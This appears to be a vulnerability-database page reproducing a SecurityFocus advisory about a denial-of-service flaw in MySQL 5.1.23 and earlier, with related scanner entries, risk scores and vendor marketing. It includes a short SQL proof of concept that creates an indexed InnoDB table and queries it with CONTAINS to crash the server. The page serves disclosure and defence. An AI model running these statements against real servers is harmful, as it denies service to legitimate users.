MySQL 5.1.23 - Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial of Service
| Reporter | Title | Published | Views | Family All 78 |
|---|---|---|---|---|
| CentOS 4 / 5 : mysql (CESA-2007:1155) | 19 Dec 200700:00 | – | nessus | |
| CentOS 4 : mysql (CESA-2007:1222-001) | 24 Dec 200700:00 | – | nessus | |
| Debian DSA-1413-1 : mysql - multiple vulnerabilities | 29 Nov 200700:00 | – | nessus | |
| F5 Networks BIG-IP : MySQL vulnerabilities (SOL8178) | 10 Oct 201400:00 | – | nessus | |
| Fedora 8 : mysql-5.0.45-6.fc8 (2007-4465) | 17 Dec 200700:00 | – | nessus | |
| Fedora 7 : mysql-5.0.45-6.fc7 (2007-4471) | 17 Dec 200700:00 | – | nessus | |
| GLSA-200711-25 : MySQL: Denial of Service | 20 Nov 200700:00 | – | nessus | |
| Mandrake Linux Security Advisory : MySQL (MDKSA-2007:243) | 11 Dec 200700:00 | – | nessus | |
| MySQL < 5.0.54 / 5.1.23 / 6.0.4 Denial of Service | 18 Jan 201200:00 | – | nessus | |
| MySQL Community Server < 5.1.23 / 6.0.4 Multiple Vulnerabilities | 13 Dec 200700:00 | – | nessus |
10
source: https://www.securityfocus.com/bid/26353/info
MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input.
Exploiting this issue allows remote attackers to crash affected database servers, denying service to legitimate users. Attackers must be able to execute arbitrary SQL statements on affected servers, which requires valid credentials to connect to affected servers.
This issue affects MySQL 5.1.23 and prior versions.
mysql> CREATE TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected
mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
Empty set
mysql> ALTER TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0
mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Jan 2014 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24
EPSS0.11351